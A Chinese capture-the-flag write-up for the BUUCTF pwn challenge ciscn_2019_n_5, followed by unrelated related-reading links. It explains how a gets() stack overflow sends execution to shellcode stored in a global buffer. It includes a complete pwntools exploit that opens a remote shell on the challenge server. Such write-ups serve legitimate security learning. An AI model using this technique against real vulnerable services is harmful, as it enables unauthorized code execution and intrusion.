[BUUCTF]PWN20——ciscn_2019_n_5

附件

步骤：
例行检查，64位，没有开启任何保护
在这里插入图片描述
试运行一下程序，看看程序的执行情况

64位ida载入，找到main函数，
逻辑很简单，第一次让我们输入名字，限制输入长度为0x64，看一下name参数，发现name在全局变量bss段上

第二次输入利用gets，没有限制长度，可以对v4造成溢出

利用过程

利用第一个输入点，往name参数里写入shellcode

context(arch='amd64',os='linux')                   #用来导入pwntools模块
shellcode=asm(shellcraft.sh())                     #利用pwntools模块自动生成shellcode
r.sendlineafter('tell me your name',shellcode)     #往name中写入shellcode

利用第二个输入点，让v4溢出到name参数地址，去执行shellcode拿到shell

payload='a'*0x28+p64(0x601080)                    #让v4溢出到name参数地址
r.sendlineafter('What do you want to say to me?',payload)

exp

from pwn import*

r=remote('node3.buuoj.cn',27785)

context(arch='amd64',os='linux')
shellcode=asm(shellcraft.sh())
r.sendlineafter('tell me your name',shellcode)

payload='a'*0x28+p64(0x601080)
r.sendlineafter('What do you want to say to me?',payload)

r.interactive()

在这里插入图片描述

查看全文

相关阅读:
Import the Add Email and Post Configuration to the SiteMap managed solution -Dynamices CRM
Dynamics CRM 2011 2013-(An error occurred while opening mailbox xxx@xx.com Microsoft.Crm.Tools.Email.Providers.)
Sitemap Editors for Dynamics CRM 2013
Configure the AD FS server for claims-based authentication -zhai zi wangluo
Add And Reset a Federation Server to a Federation Server Farm adfs ad
jfreechart 在jsp页面显示所画的图片（resin服务器的servelet配置是关键）（图片只过内存）
jfreechart在jsp中画图方式
 如何将dom4j的jar包放到java项目中
 Dom4j下载及使用Dom4j读写XML简介（转）
职业选择何去何从

原文地址：https://www.cnblogs.com/xlrp/p/14273715.html